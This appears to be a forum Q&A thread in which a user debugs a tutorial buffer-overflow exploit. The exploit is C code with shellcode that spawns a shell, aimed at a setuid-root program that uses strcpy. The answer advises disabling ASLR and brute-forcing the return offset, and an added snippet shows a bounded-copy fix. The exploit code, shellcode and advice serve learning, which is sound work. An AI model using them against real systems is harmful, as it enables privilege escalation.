1

I was trying to run this buffer overflow exploit on a vulnerable program vuln.c, compiled with gcc (I found this in some tutorial and the code is not mine). The shellcode spawns a shell.

exploit.c code:

#include <stdio.h>      // printf
#include <stdlib.h>     // malloc, free
#include <string.h>     // strlen
#include <unistd.h>     // execl

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)         // This is just a little function used to
{ __asm__("movl %esp, %eax");} // return the stack pointer: it has no return
                               // statement and relies on the value left in
                               // eax (32-bit x86 calling convention only)

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;            // Use an offset of 0
    esp = sp();            // Put the current stack pointer into esp
    ret = esp - offset;    // We want to overwrite the ret address

    printf("Stack pointer (ESP) : 0x%lx\n", esp);
    printf("    Offset from ESP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%lx\n", ret);

    // Allocate 600 bytes for buffer (on the heap)
    buffer = malloc(600);

    // Fill the entire buffer with the desired ret address
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for(i=0; i < 600; i+=4)
    { *(addr_ptr++) = ret; }

    // Fill the first 200 bytes of the buffer with NOP instructions
    for(i=0; i < 200; i++)
    { buffer[i] = '\x90'; }

    // Put the shellcode after the NOP sled
    ptr = buffer + 200;
    for(i=0; i < strlen(shellcode); i++)
    { *(ptr++) = shellcode[i]; }

    // End the string
    buffer[600-1] = 0;

    // Now call the program ./vuln with our crafted buffer as its argument
    // (the argument list must be terminated by a null pointer, not a plain 0)
    execl("./vuln", "vuln", buffer, (char *)NULL);

    // Free the buffer memory (only reached if execl fails)
    free(buffer);

    return 0;
}

This exploit is for the vulnerable code vuln.c:

#include <string.h>     // strcpy

int main(int argc, char *argv[])
{
    char buffer[500];
    strcpy(buffer, argv[1]);   // unbounded copy: argv[1] longer than 500 bytes overflows buffer
    return 0;
}

But when I run it using ./exploit it gives a segmentation fault instead of opening the shell. I used the commands:

sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit

It shows the result:

(gdb) run
Starting program: /home/a/exploit 
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln

Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax            0x0  0
ecx            0xbfe3f5a0   -1075579488
edx            0xbfe3dca8   -1075585880
ebx            0xb76e4ff4   -1217507340
esp            0xbfe3dc60   0xbfe3dc60
ebp            0xbffff338   0xbffff338
esi            0x0  0
edi            0x0  0
eip            0xbffff338   0xbffff338
eflags         0x10246  [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb) 

Please tell me where the problem lies...
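For contrast with the vuln.c above, here is an added example (not from the question or the tutorial it quotes) of the same program with the overflow removed: the copy is bounded by the destination size and an oversize argument is rejected instead of being written past the end of the stack buffer. The `bounded_copy`, `handle_arg` and `demo_len` names are my own; the 500-byte buffer and the 599-byte argument length mirror the question's vuln.c and exploit.c. Compiler flags such as `-fstack-protector` only detect an overflow after it happened; the length check is what prevents it.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500              /* same buffer size as vuln.c */

/* Result codes for bounded_copy() */
enum { COPY_OK = 0, COPY_TOO_LONG = -1, COPY_BAD_ARG = -2 };

/* Copy src into dst (capacity dstsz) only if it fits together with its
 * NUL terminator. On COPY_TOO_LONG, dst is left as an empty string so the
 * caller never works with a partially copied or unterminated buffer. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return COPY_BAD_ARG;
    size_t n = strnlen(src, dstsz);   /* never scans more than dstsz bytes of src */
    if (n >= dstsz) {                 /* no room for the terminator */
        dst[0] = '\0';
        return COPY_TOO_LONG;
    }
    memcpy(dst, src, n + 1);          /* n bytes plus the terminator */
    return COPY_OK;
}

/* Hardened equivalent of vuln.c's main(): the argument is copied into a
 * 500-byte stack buffer only when it fits. Returns the copy result so the
 * behaviour can be checked directly. */
int handle_arg(const char *arg)
{
    char buffer[BUF_SIZE];
    int rc = bounded_copy(buffer, sizeof buffer, arg);
    if (rc == COPY_TOO_LONG)
        fprintf(stderr, "argument too long (limit %zu bytes)\n",
                sizeof buffer - 1);
    return rc;
}

/* Constructed input: a string of len 'A' bytes, so the size boundary can be
 * exercised without a real command line. */
int demo_len(size_t len)
{
    static char scratch[1024];
    if (len >= sizeof scratch)
        return COPY_BAD_ARG;
    memset(scratch, 'A', len);
    scratch[len] = '\0';
    return handle_arg(scratch);
}

int main(int argc, char *argv[])
{
    if (argc > 1)                     /* behave like vuln.c, but safely */
        return handle_arg(argv[1]) == COPY_OK ? 0 : 1;
    /* 499 bytes fit, 500 do not (no room for the terminator), 599 is the
       length exploit.c passes */
    printf("499 -> %d, 500 -> %d, 599 -> %d\n",
           demo_len(499), demo_len(500), demo_len(599));
    return 0;
}
```

The check is on the destination size, not on the input, which is why it also holds for inputs that are not NUL-terminated within the first 500 bytes: `strnlen` stops scanning at `dstsz` and the copy is refused.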

2
  • You're trying to use an exploit from a book published 10 years ago - do you think security in Linux might have improved since then, perhaps ? Commented Jul 8, 2013 at 15:32
  • Does that mean the problem lies in the shellcode? I tried to replace it with the shellcode generated by the msfpayload utility in Metasploit, but it still shows the same segmentation fault. Thanks for the reply! Commented Jul 8, 2013 at 15:50

1 Answer 1

0

Your problem lies in the address you are jumping to....

That exploit does NOT use memory leaks, so it is supposed to be run in a system that does not support ASLR.

Once ASLR is disabled in your system, you have to run the exploit N times until jumping to the right shellcode address...

Function sp() returns the esp on this process, but it may change depending on the backtrace and the process... so you will have to increment a value until reaching the right address.....

Conclusion:

  • disable ASLR
  • add an offset that is incremented on each iteration and add it to the esp value before it is used

Good luck!!!!
